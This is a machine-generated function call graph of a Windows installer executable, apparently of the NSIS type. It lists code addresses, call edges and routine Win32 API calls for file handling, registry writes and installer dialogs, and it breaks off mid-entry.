3118 405629 3117->3118 3119 40561c lstrcatA 3117->3119 3164 4057c8 lstrlenA 3118->3164 3121 40562f 3119->3121 3124 40563d lstrcatA 3121->3124 3125 405648 lstrlenA FindFirstFileA 3121->3125 3124->3125 3125->3115 3137 40566c 3125->3137 3126 405746 3185 405781 lstrlenA CharPrevA 3126->3185 3128 4057ac CharNextA 3128->3137 3130 405569 5 API calls 3131 405758 3130->3131 3132 405772 3131->3132 3136 40575c 3131->3136 3133 404fdc 25 API calls 3132->3133 3133->3114 3134 4056fd FindNextFileA 3134->3137 3138 405715 FindClose 3134->3138 3136->3114 3139 404fdc 25 API calls 3136->3139 3137->3128 3137->3134 3145 4056be 3137->3145 3168 405cf1 lstrcpynA 3137->3168 3138->3115 3140 405769 3139->3140 3141 405ba5 40 API calls 3140->3141 3144 405770 3141->3144 3143 4055b1 64 API calls 3143->3145 3144->3114 3145->3134 3145->3143 3146 404fdc 25 API calls 3145->3146 3147 404fdc 25 API calls 3145->3147 3169 405569 3145->3169 3177 405ba5 3145->3177 3146->3134 3147->3145 3188 405cf1 lstrcpynA 3149->3188 3151 405880 3152 40581a 4 API calls 3151->3152 3153 405886 3152->3153 3154 4055d1 3153->3154 3155 405f5c 5 API calls 3153->3155 3154->3112 3154->3113 3161 405896 3155->3161 3156 4058c1 lstrlenA 3157 4058cc 3156->3157 3156->3161 3159 405781 3 API calls 3157->3159 3158 405ff5 2 API calls 3158->3161 3160 4058d1 GetFileAttributesA 3159->3160 3160->3154 3161->3154 3161->3156 3161->3158 3162 4057c8 2 API calls 3161->3162 3162->3156 3163->3117 3165 4057d5 3164->3165 3166 4057e6 3165->3166 3167 4057da CharPrevA 3165->3167 3166->3121 3167->3165 3167->3166 3168->3137 3189 40595d GetFileAttributesA 3169->3189 3172 405584 RemoveDirectoryA 3175 405592 3172->3175 3173 40558c DeleteFileA 3173->3175 3174 405596 3174->3145 3175->3174 3176 4055a2 SetFileAttributesA 3175->3176 3176->3174 3178 40601c 3 API calls 3177->3178 3179 405bac 3178->3179 3181 405bcd 3179->3181 3192 405a29 lstrcpyA 3179->3192 3181->3145 3183 405742 3182->3183 3184 40600b FindClose 3182->3184 3183->3114 3183->3126 3184->3183 3186 40574c 3185->3186 3187 40579b lstrcatA 3185->3187 3186->3130 3187->3186 3188->3151 3190 405575 3189->3190 3191 40596f SetFileAttributesA 3189->3191 3190->3172 3190->3173 3190->3174 3191->3190 3193 405a52 3192->3193 3194 405a78 GetShortPathNameA 3192->3194 3217 405982 GetFileAttributesA CreateFileA 3193->3217 3195 405a8d 3194->3195 3196 405b9f 3194->3196 3195->3196 3198 405a95 wsprintfA 3195->3198 3196->3181 3200 405d13 18 API calls 3198->3200 3199 405a5c CloseHandle GetShortPathNameA 3199->3196 3201 405a70 3199->3201 3202 405abd 3200->3202 3201->3194 3201->3196 3218 405982 GetFileAttributesA CreateFileA 3202->3218 3204 405aca 3204->3196 3205 405ad9 GetFileSize GlobalAlloc 3204->3205 3206 405b98 CloseHandle 3205->3206 3207 405afb 3205->3207 3206->3196 3219 4059fa ReadFile 3207->3219 3212 405b1a lstrcpyA 3215 405b3c 3212->3215 3213 405b2e 3214 4058e7 4 API calls 3213->3214 3214->3215 3216 405b73 SetFilePointer WriteFile GlobalFree 3215->3216 3216->3206 3217->3199 3218->3204 3220 405a18 3219->3220 3220->3206 3221 4058e7 lstrlenA 3220->3221 3222 405928 lstrlenA 3221->3222 3223 405930 3222->3223 3224 405901 lstrcmpiA 3222->3224 3223->3212 3223->3213 3224->3223 3225 40591f CharNextA 3224->3225 3225->3222 3226 401595 3227 4029fd 18 API calls 3226->3227 3228 40159c SetFileAttributesA 3227->3228 3229 4015ae 3228->3229 4100 401c95 4101 4029e0 18 API calls 4100->4101 4102 401c9c 4101->4102 4103 4029e0 18 API calls 4102->4103 4104 401ca4 GetDlgItem 4103->4104 4105 4024cb 4104->4105 3230 403217 #17 SetErrorMode OleInitialize 3231 40601c 3 API calls 3230->3231 3232 40325c SHGetFileInfoA 3231->3232 3305 405cf1 lstrcpynA 3232->3305 3234 403287 GetCommandLineA 3306 405cf1 lstrcpynA 3234->3306 3236 403299 GetModuleHandleA 3237 4032b0 3236->3237 3238 4057ac CharNextA 3237->3238 3239 4032c4 CharNextA 3238->3239 3244 4032d4 3239->3244 3240 40339e 3241 4033b1 GetTempPathA 3240->3241 3307 4031e3 3241->3307 3243 4033c9 3245 403423 DeleteFileA 3243->3245 3246 4033cd GetWindowsDirectoryA lstrcatA 3243->3246 3244->3240 3247 4057ac CharNextA 3244->3247 3252 4033a0 3244->3252 3315 402c79 GetTickCount GetModuleFileNameA 3245->3315 3249 4031e3 11 API calls 3246->3249 3247->3244 3251 4033e9 3249->3251 3250 403437 3253 4034d1 ExitProcess CoUninitialize 3250->3253 3261 4057ac CharNextA 3250->3261 3290 4034bd 3250->3290 3251->3245 3255 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3251->3255 3399 405cf1 lstrcpynA 3252->3399 3256 4034e6 3253->3256 3257 4035da 3253->3257 3258 4031e3 11 API calls 3255->3258 3402 405505 3256->3402 3259 40367d ExitProcess 3257->3259 3264 40601c 3 API calls 3257->3264 3263 40341b 3258->3263 3266 403452 3261->3266 3263->3245 3263->3253 3269 4035ed 3264->3269 3265 4034cd 3265->3253 3271 403498 3266->3271 3272 4034fc lstrcatA lstrcmpiA 3266->3272 3270 40601c 3 API calls 3269->3270 3273 4035f6 3270->3273 3275 40586f 18 API calls 3271->3275 3272->3253 3274 403518 CreateDirectoryA SetCurrentDirectoryA 3272->3274 3276 40601c 3 API calls 3273->3276 3277 40353a 3274->3277 3278 40352f 3274->3278 3279 4034a3 3275->3279 3284 4035ff 3276->3284 3407 405cf1 lstrcpynA 3277->3407 3406 405cf1 lstrcpynA 3278->3406 3279->3253 3400 405cf1 lstrcpynA 3279->3400 3283 40601c 3 API calls 3288 403654 3283->3288 3289 40360d GetCurrentProcess 3284->3289 3295 40361d 3284->3295 3285 4034b2 3401 405cf1 lstrcpynA 3285->3401 3287 405d13 18 API calls 3291 403579 DeleteFileA 3287->3291 3292 403669 ExitWindowsEx 3288->3292 3294 403676 3288->3294 3289->3295 3345 403787 3290->3345 3293 403586 CopyFileA 3291->3293 3300 403548 3291->3300 3292->3259 3292->3294 3293->3300 3408 40140b 3294->3408 3295->3283 3297 4035ce 3299 405ba5 40 API calls 3297->3299 3298 405ba5 40 API calls 3298->3300 3301 4035d5 3299->3301 3300->3287 3300->3297 3300->3298 3302 405d13 18 API calls 3300->3302 3303 4054a4 2 API calls 3300->3303 3304 4035ba CloseHandle 3300->3304 3301->3253 3302->3300 3303->3300 3304->3300 3305->3234 3306->3236 3308 405f5c 5 API calls 3307->3308 3310 4031ef 3308->3310 3309 4031f9 3309->3243 3310->3309 3311 405781 3 API calls 3310->3311 3312 403201 CreateDirectoryA 3311->3312 3411 4059b1 3312->3411 3415 405982 GetFileAttributesA CreateFileA 3315->3415 3317 402cbc 3344 402cc9 3317->3344 3416 405cf1 lstrcpynA 3317->3416 3319 402cdf 3320 4057c8 2 API calls 3319->3320 3321 402ce5 3320->3321 3417 405cf1 lstrcpynA 3321->3417 3323 402cf0 GetFileSize 3324 402df1 3323->3324 3343 402d07 3323->3343 3418 402bda 3324->3418 3328 402e8c 3332 402bda 33 API calls 3328->3332 3329 402e34 GlobalAlloc 3331 402e4b 3329->3331 3336 4059b1 2 API calls 3331->3336 3332->3344 3333 402e15 3334 4031b6 ReadFile 3333->3334 3337 402e20 3334->3337 3335 402bda 33 API calls 3335->3343 3338 402e5c CreateFileA 3336->3338 3337->3329 3337->3344 3339 402e96 3338->3339 3338->3344 3433 4031cc SetFilePointer 3339->3433 3341 402ea4 3434 402f1f 3341->3434 3343->3324 3343->3328 3343->3335 3343->3344 3449 4031b6 3343->3449 3344->3250 3346 40601c 3 API calls 3345->3346 3347 40379b 3346->3347 3348 4037a1 3347->3348 3349 4037b3 3347->3349 3493 405c4f wsprintfA 3348->3493 3350 405bd8 3 API calls 3349->3350 3351 4037de 3350->3351 3353 4037fc lstrcatA 3351->3353 3355 405bd8 3 API calls 3351->3355 3354 4037b1 3353->3354 3477 403a4c 3354->3477 3355->3353 3358 40586f 18 API calls 3359 40382e 3358->3359 3360 4038b7 3359->3360 3362 405bd8 3 API calls 3359->3362 3361 40586f 18 API calls 3360->3361 3363 4038bd 3361->3363 3364 40385a 3362->3364 3365 4038cd LoadImageA 3363->3365 3366 405d13 18 API calls 3363->3366 3364->3360 3369 403876 lstrlenA 3364->3369 3372 4057ac CharNextA 3364->3372 3367 403973 3365->3367 3368 4038f4 RegisterClassA 3365->3368 3366->3365 3371 40140b 2 API calls 3367->3371 3370 40392a SystemParametersInfoA CreateWindowExA 3368->3370 3398 40397d 3368->3398 3373 403884 lstrcmpiA 3369->3373 3374 4038aa 3369->3374 3370->3367 3375 403979 3371->3375 3377 403874 3372->3377 3373->3374 3378 403894 GetFileAttributesA 3373->3378 3376 405781 3 API calls 3374->3376 3379 403a4c 19 API calls 3375->3379 3375->3398 3380 4038b0 3376->3380 3377->3369 3381 4038a0 3378->3381 3382 40398a 3379->3382 3494 405cf1 lstrcpynA 3380->3494 3381->3374 3384 4057c8 2 API calls 3381->3384 3385 403996 ShowWindow LoadLibraryA 3382->3385 3386 403a19 3382->3386 3384->3374 3387 4039b5 LoadLibraryA 3385->3387 3388 4039bc GetClassInfoA 3385->3388 3486 4050ae OleInitialize 3386->3486 3387->3388 3390 4039d0 GetClassInfoA RegisterClassA 3388->3390 3391 4039e6 DialogBoxParamA 3388->3391 3390->3391 3393 40140b 2 API calls 3391->3393 3392 403a1f 3394 403a23 3392->3394 3395 403a3b 3392->3395 3393->3398 3397 40140b 2 API calls 3394->3397 3394->3398 3396 40140b 2 API calls 3395->3396 3396->3398 3397->3398 3398->3265 3399->3241 3400->3285 3401->3290 3404 40551a 3402->3404 3403 4034f4 ExitProcess 3404->3403 3405 40552e MessageBoxIndirectA 3404->3405 3405->3403 3406->3277 3407->3300 3409 401389 2 API calls 3408->3409 3410 401420 3409->3410 3410->3259 3412 4059bc GetTickCount GetTempFileNameA 3411->3412 3413 403215 3412->3413 3414 4059e9 3412->3414 3413->3243 3414->3412 3414->3413 3415->3317 3416->3319 3417->3323 3419 402c00 3418->3419 3420 402be8 3418->3420 3422 402c10 GetTickCount 3419->3422 3423 402c08 3419->3423 3421 402bf1 DestroyWindow 3420->3421 3426 402bf8 3420->3426 3421->3426 3425 402c1e 3422->3425 3422->3426 3424 406055 2 API calls 3423->3424 3424->3426 3427 402c53 CreateDialogParamA ShowWindow 3425->3427 3428 402c26 3425->3428 3426->3329 3426->3344 3452 4031cc SetFilePointer 3426->3452 3427->3426 3428->3426 3453 402bbe 3428->3453 3430 402c34 wsprintfA 3431 404fdc 25 API calls 3430->3431 3432 402c51 3431->3432 3432->3426 3433->3341 3435 402f4b 3434->3435 3436 402f2f SetFilePointer 3434->3436 3456 40303a GetTickCount 3435->3456 3436->3435 3439 4059fa ReadFile 3440 402f6b 3439->3440 3441 40303a 43 API calls 3440->3441 3448 402ff6 3440->3448 3442 402f82 3441->3442 3443 402ffc ReadFile 3442->3443 3446 402f92 3442->3446 3442->3448 3443->3448 3445 4059fa ReadFile 3445->3446 3446->3445 3447 402fc5 WriteFile 3446->3447 3446->3448 3447->3446 3447->3448 3448->3344 3450 4059fa ReadFile 3449->3450 3451 4031c9 3450->3451 3451->3343 3452->3333 3454 402bcd 3453->3454 3455 402bcf MulDiv 3453->3455 3454->3455 3455->3430 3457 4031a4 3456->3457 3458 403069 3456->3458 3459 402bda 33 API calls 3457->3459 3469 4031cc SetFilePointer 3458->3469 3461 402f52 3459->3461 3461->3439 3461->3448 3462 403074 SetFilePointer 3464 403099 3462->3464 3463 4031b6 ReadFile 3463->3464 3464->3461 3464->3463 3466 402bda 33 API calls 3464->3466 3467 40312e WriteFile 3464->3467 3468 403185 SetFilePointer 3464->3468 3470 40611c 3464->3470 3466->3464 3467->3461 3467->3464 3468->3457 3469->3462 3471 406141 3470->3471 3472 406149 3470->3472 3471->3464 3472->3471 3473 4061d0 GlobalFree 3472->3473 3474 4061d9 GlobalAlloc 3472->3474 3475 406250 GlobalAlloc 3472->3475 3476 406247 GlobalFree 3472->3476 3473->3474 3474->3471 3474->3472 3475->3471 3475->3472 3476->3475 3478 403a60 3477->3478 3495 405c4f wsprintfA 3478->3495 3480 403ad1 3481 405d13 18 API calls 3480->3481 3482 403add SetWindowTextA 3481->3482 3483 40380c 3482->3483 3484 403af9 3482->3484 3483->3358 3484->3483 3485 405d13 18 API calls 3484->3485 3485->3484 3496 404038 3486->3496 3488 4050d1 3492 4050f8 3488->3492 3499 401389 3488->3499 3489 404038 SendMessageA 3490 40510a OleUninitialize 3489->3490 3490->3392 3492->3489 3493->3354 3494->3360 3495->3480 3497 404050 3496->3497 3498 404041 SendMessageA 3496->3498 3497->3488 3498->3497 3501 401390 3499->3501 3500 4013fe 3500->3488 3501->3500 3502 4013cb MulDiv SendMessageA 3501->3502 3502->3501 3521 403b19 3522 403b31 3521->3522 3523 403c6c 3521->3523 3522->3523 3524 403b3d 3522->3524 3525 403cbd 3523->3525 3526 403c7d GetDlgItem GetDlgItem 3523->3526 3527 403b48 SetWindowPos 3524->3527 3528 403b5b 3524->3528 3530 403d17 3525->3530 3538 401389 2 API calls 3525->3538 3529 403fec 19 API calls 3526->3529 3527->3528 3532 403b60 ShowWindow 3528->3532 3533 403b78 3528->3533 3534 403ca7 SetClassLongA 3529->3534 3531 404038 SendMessageA 3530->3531 3582 403c67 3530->3582 3580 403d29 3531->3580 3532->3533 3535 403b80 DestroyWindow 3533->3535 3536 403b9a 3533->3536 3537 40140b 2 API calls 3534->3537 3590 403f75 3535->3590 3539 403bb0 3536->3539 3540 403b9f SetWindowLongA 3536->3540 3537->3525 3541 403cef 3538->3541 3544 403c59 3539->3544 3545 403bbc GetDlgItem 3539->3545 3540->3582 3541->3530 3546 403cf3 SendMessageA 3541->3546 3542 40140b 2 API calls 3542->3580 3543 403f77 DestroyWindow KiUserCallbackDispatcher 3543->3590 3600 404053 3544->3600 3549 403bcf SendMessageA IsWindowEnabled 3545->3549 3551 403bec 3545->3551 3546->3582 3548 403fa6 ShowWindow 3548->3582 3549->3551 3549->3582 3550 405d13 18 API calls 3550->3580 3552 403bf9 3551->3552 3553 403c40 SendMessageA 3551->3553 3554 403c0c 3551->3554 3562 403bf1 3551->3562 3552->3553 3552->3562 3553->3544 3556 403c14 3554->3556 3557 403c29 3554->3557 3559 40140b 2 API calls 3556->3559 3560 40140b 2 API calls 3557->3560 3558 403c27 3558->3544 3559->3562 3563 403c30 3560->3563 3561 403fec 19 API calls 3561->3580 3597 403fc5 3562->3597 3563->3544 3563->3562 3565 403da4 GetDlgItem 3566 403dc1 ShowWindow KiUserCallbackDispatcher 3565->3566 3567 403db9 3565->3567 3594 40400e KiUserCallbackDispatcher 3566->3594 3567->3566 3569 403deb EnableWindow 3572 403dff 3569->3572 3570 403e04 GetSystemMenu EnableMenuItem SendMessageA 3571 403e34 SendMessageA 3570->3571 3570->3572 3571->3572 3572->3570 3595 404021 SendMessageA 3572->3595 3596 405cf1 lstrcpynA 3572->3596 3575 403e62 lstrlenA 3576 405d13 18 API calls 3575->3576 3577 403e73 SetWindowTextA 3576->3577 3578 401389 2 API calls 3577->3578 3578->3580 3579 403eb7 DestroyWindow 3581 403ed1 CreateDialogParamA 3579->3581 3579->3590 3580->3542 3580->3543 3580->3550 3580->3561 3580->3579 3580->3582 3591 403fec 3580->3591 3583 403f04 3581->3583 3581->3590 3584 403fec 19 API calls 3583->3584 3585 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3584->3585 3586 401389 2 API calls 3585->3586 3587 403f55 3586->3587 3587->3582 3588 403f5d ShowWindow 3587->3588 3589 404038 SendMessageA 3588->3589 3589->3590 3590->3548 3590->3582 3592 405d13 18 API calls 3591->3592 3593 403ff7 SetDlgItemTextA 3592->3593 3593->3565 3594->3569 3595->3572 3596->3575 3598 403fd2 SendMessageA 3597->3598 3599 403fcc 3597->3599 3598->3558 3599->3598 3601 40406b GetWindowLongA 3600->3601 3611 4040f4 3600->3611 3602 40407c 3601->3602 3601->3611 3603 40408b GetSysColor 3602->3603 3604 40408e 3602->3604 3603->3604 3605 404094 SetTextColor 3604->3605 3606 40409e SetBkMode 3604->3606 3605->3606 3607 4040b6 GetSysColor 3606->3607 3608 4040bc 3606->3608 3607->3608 3609 4040c3 SetBkColor 3608->3609 3610 4040cd 3608->3610 3609->3610 3610->3611 3612 4040e0 DeleteObject 3610->3612 3613 4040e7 CreateBrushIndirect 3610->3613 3611->3582 3612->3613 3613->3611 4113 402519 4114 4029e0 18 API calls 4113->4114 4117 402523 4114->4117 4115 40258d 4116 4059fa ReadFile 4116->4117 4117->4115 4117->4116 4118 40258f 4117->4118 4119 40259f 4117->4119 4122 405c4f wsprintfA 4118->4122 4119->4115 4121 4025b5 SetFilePointer 4119->4121 4121->4115 4122->4115 3614 40511a 3615 4052c7 3614->3615 3616 40513c GetDlgItem GetDlgItem GetDlgItem 3614->3616 3618 4052f7 3615->3618 3619 4052cf GetDlgItem CreateThread CloseHandle 3615->3619 3660 404021 SendMessageA 3616->3660 3621 405325 3618->3621 3622 405346 3618->3622 3623 40530d ShowWindow ShowWindow 3618->3623 3619->3618 3663 4050ae 5 API calls 3619->3663 3620 4051ad 3629 4051b4 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3620->3629 3624 405380 3621->3624 3625 40532d 3621->3625 3628 404053 8 API calls 3622->3628 3662 404021 SendMessageA 3623->3662 3624->3622 3637 40538d SendMessageA 3624->3637 3626 405335 3625->3626 3627 405359 ShowWindow 3625->3627 3631 403fc5 SendMessageA 3626->3631 3633 405379 3627->3633 3634 40536b 3627->3634 3632 405352 3628->3632 3635 405223 3629->3635 3636 405207 SendMessageA SendMessageA 3629->3636 3631->3622 3639 403fc5 SendMessageA 3633->3639 3638 404fdc 25 API calls 3634->3638 3640 405236 3635->3640 3641 405228 SendMessageA 3635->3641 3636->3635 3637->3632 3642 4053a6 CreatePopupMenu 3637->3642 3638->3633 3639->3624 3644 403fec 19 API calls 3640->3644 3641->3640 3643 405d13 18 API calls 3642->3643 3646 4053b6 AppendMenuA 3643->3646 3645 405246 3644->3645 3649 405283 GetDlgItem SendMessageA 3645->3649 3650 40524f ShowWindow 3645->3650 3647 4053d4 GetWindowRect 3646->3647 3648 4053e7 TrackPopupMenu 3646->3648 3647->3648 3648->3632 3651 405403 3648->3651 3649->3632 3654 4052aa SendMessageA SendMessageA 3649->3654 3652 405272 3650->3652 3653 405265 ShowWindow 3650->3653 3655 405422 SendMessageA 3651->3655 3661 404021 SendMessageA 3652->3661 3653->3652 3654->3632 3655->3655 3656 40543f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3655->3656 3658 405461 SendMessageA 3656->3658 3658->3658 3659 405483 GlobalUnlock SetClipboardData CloseClipboard 3658->3659 3659->3632 3660->3620 3661->3649 3662->3621 3682 40231c 3683 402322 3682->3683 3684 4029fd 18 API calls 3683->3684 3685 402334 3684->3685 3686 4029fd 18 API calls 3685->3686 3687 40233e RegCreateKeyExA 3686->3687 3688 402892 3687->3688 3689 402368 3687->3689 3690 402380 3689->3690 3692 4029fd 18 API calls 3689->3692 3691 40238c 3690->3691 3694 4029e0 18 API calls 3690->3694 3695 4023a7 RegSetValueExA 3691->3695 3696 402f1f 46 API calls 3691->3696 3693 402379 lstrlenA 3692->3693 3693->3690 3694->3691 3697 4023bd RegCloseKey 3695->3697 3696->3695 3697->3688 4123 40261c 4124 40261f 4123->4124 4126 402637 4123->4126 4125 40262c FindNextFileA 4124->4125 4125->4126 4127 402676 4125->4127 4129 405cf1 lstrcpynA 4127->4129 4129->4126 4130 4016a1 4131 4029fd 18 API calls 4130->4131 4132 4016a7 GetFullPathNameA 4131->4132 4133 4016be 4132->4133 4139 4016df 4132->4139 4136 405ff5 2 API calls 4133->4136 4133->4139 4134 402892 4135 4016f3 GetShortPathNameA 4135->4134 4137 4016cf 4136->4137 4137->4139 4140 405cf1 lstrcpynA 4137->4140 4139->4134 4139->4135 4140->4139 4141 401d26 GetDC GetDeviceCaps 4142 4029e0 18 API calls 4141->4142 4143 401d44 MulDiv ReleaseDC 4142->4143 4144 4029e0 18 API calls 4143->4144 4145 401d63 4144->4145 4146 405d13 18 API calls 4145->4146 4147 401d9c CreateFontIndirectA 4146->4147 4148 4024cb 4147->4148 4149 40442a 4150 404456 4149->4150 4151 404467 4149->4151 4210 4054e9 GetDlgItemTextA 4150->4210 4152 404473 GetDlgItem 4151->4152 4155 4044d2 4151->4155 4154 404487 4152->4154 4159 40449b SetWindowTextA 4154->4159 4162 40581a 4 API calls 4154->4162 4156 4045b6 4155->4156 4164 405d13 18 API calls 4155->4164 4208 404744 4155->4208 4156->4208 4212 4054e9 GetDlgItemTextA 4156->4212 4157 404461 4158 405f5c 5 API calls 4157->4158 4158->4151 4163 403fec 19 API calls 4159->4163 4161 404053 8 API calls 4166 404758 4161->4166 4167 404491 4162->4167 4168 4044b7 4163->4168 4169 404546 SHBrowseForFolderA 4164->4169 4165 4045e6 4170 40586f 18 API calls 4165->4170 4167->4159 4174 405781 3 API calls 4167->4174 4171 403fec 19 API calls 4168->4171 4169->4156 4172 40455e CoTaskMemFree 4169->4172 4173 4045ec 4170->4173 4175 4044c5 4171->4175 4176 405781 3 API calls 4172->4176 4213 405cf1 lstrcpynA 4173->4213 4174->4159 4211 404021 SendMessageA 4175->4211 4183 40456b 4176->4183 4179 4044cb 4182 40601c 3 API calls 4179->4182 4180 4045a2 SetDlgItemTextA 4180->4156 4181 404603 4184 40601c 3 API calls 4181->4184 4182->4155 4183->4180 4185 405d13 18 API calls 4183->4185 4192 40460b 4184->4192 4186 40458a lstrcmpiA 4185->4186 4186->4180 4188 40459b lstrcatA 4186->4188 4187 404645 4214 405cf1 lstrcpynA 4187->4214 4188->4180 4190 40464c 4191 40581a 4 API calls 4190->4191 4193 404652 GetDiskFreeSpaceA 4191->4193 4192->4187 4196 4057c8 2 API calls 4192->4196 4197 404696 4192->4197 4195 404674 MulDiv 4193->4195 4193->4197 4195->4197 4196->4192 4198 4046f3 4197->4198 4200 4047c5 21 API calls 4197->4200 4199 404716 4198->4199 4202 40140b 2 API calls 4198->4202 4215 40400e KiUserCallbackDispatcher 4199->4215 4201 4046e5 4200->4201 4203 4046f5 SetDlgItemTextA 4201->4203 4204 4046ea 4201->4204 4202->4199 4203->4198 4206 4047c5 21 API calls 4204->4206 4206->4198 4207 404732 4207->4208 4216 4043bf 4207->4216 4208->4161 4210->4157 4211->4179 4212->4165 4213->4181 4214->4190 4215->4207 4217 4043d2 SendMessageA 4216->4217 4218 4043cd 4216->4218 4217->4208 4218->4217 4219 40172c 4220 4029fd 18 API calls 4219->4220 4221 401733 4220->4221 4222 4059b1 2 API calls 4221->4222 4223 40173a 4222->4223 4223->4223 4224 401dac 4225 4029e0 18 API calls 4224->4225 4226 401db2 4225->4226 4227 4029e0 18 API calls 4226->4227 4228 401dbb 4227->4228 4229 401dc2 ShowWindow 4228->4229 4230 401dcd EnableWindow 4228->4230 4231 402892 4229->4231 4230->4231 4232 401eac 4233 4029fd 18 API calls 4232->4233 4234 401eb3 4233->4234 4235 405ff5 2 API calls 4234->4235 4236 401eb9 4235->4236 4238 401ecb 4236->4238 4239 405c4f wsprintfA 4236->4239 4239->4238 4240 40192d 4241 4029fd 18 API calls 4240->4241 4242 401934 lstrlenA 4241->4242 4243 4024cb 4242->4243 4244 4024af 4245 4029fd 18 API calls 4244->4245 4246 4024b6 4245->4246 4249 405982 GetFileAttributesA CreateFileA 4246->4249 4248 4024c2 4249->4248 4257 401cb0 4258 4029e0 18 API calls 4257->4258 4259 401cc0 SetWindowLongA 4258->4259 4260 402892 4259->4260 4261 401a31 4262 4029e0 18 API calls 4261->4262 4263 401a37 4262->4263 4264 4029e0 18 API calls 4263->4264 4265 4019e1 4264->4265 3047 401e32 3048 4029fd 18 API calls 3047->3048 3049 401e38 3048->3049 3050 404fdc 25 API calls 3049->3050 3051 401e42 3050->3051 3063 4054a4 CreateProcessA 3051->3063 3053 401e48 3054 401e9e CloseHandle 3053->3054 3055 402663 3053->3055 3056 401e67 WaitForSingleObject 3053->3056 3066 406055 3053->3066 3054->3055 3056->3053 3057 401e75 GetExitCodeProcess 3056->3057 3059 401e92 3057->3059 3060 401e87 3057->3060 3059->3054 3062 401e90 3059->3062 3070 405c4f wsprintfA 3060->3070 3062->3054 3064 4054d3 CloseHandle 3063->3064 3065 4054df 3063->3065 3064->3065 3065->3053 3067 406072 PeekMessageA 3066->3067 3068 406082 3067->3068 3069 406068 DispatchMessageA 3067->3069 3068->3056 3069->3067 3070->3062 3071 4015b3 3072 4029fd 18 API calls 3071->3072 3073 4015ba 3072->3073 3089 40581a CharNextA CharNextA 3073->3089 3075 40160a 3077 401638 3075->3077 3078 40160f 3075->3078 3076 4057ac CharNextA 3079 4015d0 CreateDirectoryA 3076->3079 3081 401423 25 API calls 3077->3081 3080 401423 25 API calls 3078->3080 3082 4015e5 GetLastError 3079->3082 3085 4015c2 3079->3085 3083 401616 3080->3083 3088 401630 3081->3088 3084 4015f2 GetFileAttributesA 3082->3084 3082->3085 3095 405cf1 lstrcpynA 3083->3095 3084->3085 3085->3075 3085->3076 3087 401621 SetCurrentDirectoryA 3087->3088 3090 405835 3089->3090 3093 405845 3089->3093 3092 405840 CharNextA 3090->3092 3090->3093 3091 405865 3091->3085 3092->3091 3093->3091 3094 4057ac CharNextA 3093->3094 3094->3093 3095->3087 4266 404135 4267 404257 4266->4267 4268 40414b 4266->4268 4269 4042c6 4267->4269 4273 40439a 4267->4273 4276 40429b GetDlgItem SendMessageA 4267->4276 4270 403fec 19 API calls 4268->4270 4271 4042d0 GetDlgItem 4269->4271 4269->4273 4274 4041a1 4270->4274 4272 404358 4271->4272 4275 4042e6 4271->4275 4272->4273 4280 40436a 4272->4280 4277 404053 8 API calls 4273->4277 4278 403fec 19 API calls 4274->4278 4275->4272 4279 40430c 6 API calls 4275->4279 4297 40400e KiUserCallbackDispatcher 4276->4297 4282 404395 4277->4282 4283 4041ae CheckDlgButton 4278->4283 4279->4272 4285 404370 SendMessageA 4280->4285 4286 404381 4280->4286 4295 40400e KiUserCallbackDispatcher 4283->4295 4285->4286 4286->4282 4289 404387 SendMessageA 4286->4289 4287 4042c1 4290 4043bf SendMessageA 4287->4290 4288 4041cc GetDlgItem 4296 404021 SendMessageA 4288->4296 4289->4282 4290->4269 4292 4041e2 SendMessageA 4293 404200 GetSysColor 4292->4293 4294 404209 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4292->4294 4293->4294 4294->4282 4295->4288 4296->4292 4297->4287 4298 402036 4299 4029fd 18 API calls 4298->4299 4300 40203d 4299->4300 4301 4029fd 18 API calls 4300->4301 4302 402047 4301->4302 4303 4029fd 18 API calls 4302->4303 4304 402051 4303->4304 4305 4029fd 18 API calls 4304->4305 4306 40205b 4305->4306 4307 4029fd 18 API calls 4306->4307 4308 402064 4307->4308 4309 40207a CoCreateInstance 4308->4309 4310 4029fd 18 API calls 4308->4310 4313 402099 4309->4313 4314 40214d 4309->4314 4310->4309 4311 401423 25 API calls 4312 402181 4311->4312 4313->4314 4315 40212f MultiByteToWideChar 4313->4315 4314->4311 4314->4312 4315->4314 4316 4014b7 4317 4014bd 4316->4317 4318 401389 2 API calls 4317->4318 4319 4014c5 4318->4319 4320 401bb8 4321 4029e0 18 API calls 4320->4321 4322 401bbf 4321->4322 4323 4029e0 18 API calls 4322->4323 4324 401bc9 4323->4324 4325 401bd9 4324->4325 4327 4029fd 18 API calls 4324->4327 4326 401be9 4325->4326 4328 4029fd 18 API calls 4325->4328 4329 401bf4 4326->4329 4330 401c38 4326->4330 4327->4325 4328->4326 4331 4029e0 18 API calls 4329->4331 4332 4029fd 18 API calls 4330->4332 4333 401bf9 4331->4333 4334 401c3d 4332->4334 4335 4029e0 18 API calls 4333->4335 4336 4029fd 18 API calls 4334->4336 4338 401c02 4335->4338 4337 401c46 FindWindowExA 4336->4337 4339 401c64 4337->4339 4340 401c28 SendMessageA 4338->4340 4341 401c0a SendMessageTimeoutA 4338->4341 4340->4339 4341->4339 3664 40243a 3665 402b07 19 API calls 3664->3665 3666 402444 3665->3666 3674 4029e0 3666->3674 3668 40244d 3669 402470 RegEnumValueA 3668->3669 3670 402464 RegEnumKeyA 3668->3670 3672 402663 3668->3672 3671 402489 RegCloseKey 3669->3671 3669->3672 3670->3671 3671->3672 3675 405d13 18 API calls 3674->3675 3676 4029f4 3675->3676 3676->3668 4342 40223b 4343 402243 4342->4343 4345 402249 4342->4345 4344 4029fd 18 API calls 4343->4344 4344->4345 4346 402259 4345->4346 4347 4029fd 18 API calls 4345->4347 4348 402267 4346->4348 4349 4029fd 18 API calls 4346->4349 4347->4346 4350 4029fd 18 API calls 4348->4350 4349->4348 4351 402270 WritePrivateProfileStringA 4350->4351 3699 40173f 3700 4029fd 18 API calls 3699->3700 3701 401746 3700->3701 3702 401764 3701->3702 3703 40176c 3701->3703 3738 405cf1 lstrcpynA 3702->3738 3739 405cf1 lstrcpynA 3703->3739 3706 40176a 3710 405f5c 5 API calls 3706->3710 3707 401777 3708 405781 3 API calls 3707->3708 3709 40177d lstrcatA 3708->3709 3709->3706 3731 401789 3710->3731 3711 405ff5 2 API calls 3711->3731 3712 40595d 2 API calls 3712->3731 3714 4017a0 CompareFileTime 3714->3731 3715 401864 3716 404fdc 25 API calls 3715->3716 3719 40186e 3716->3719 3717 404fdc 25 API calls 3725 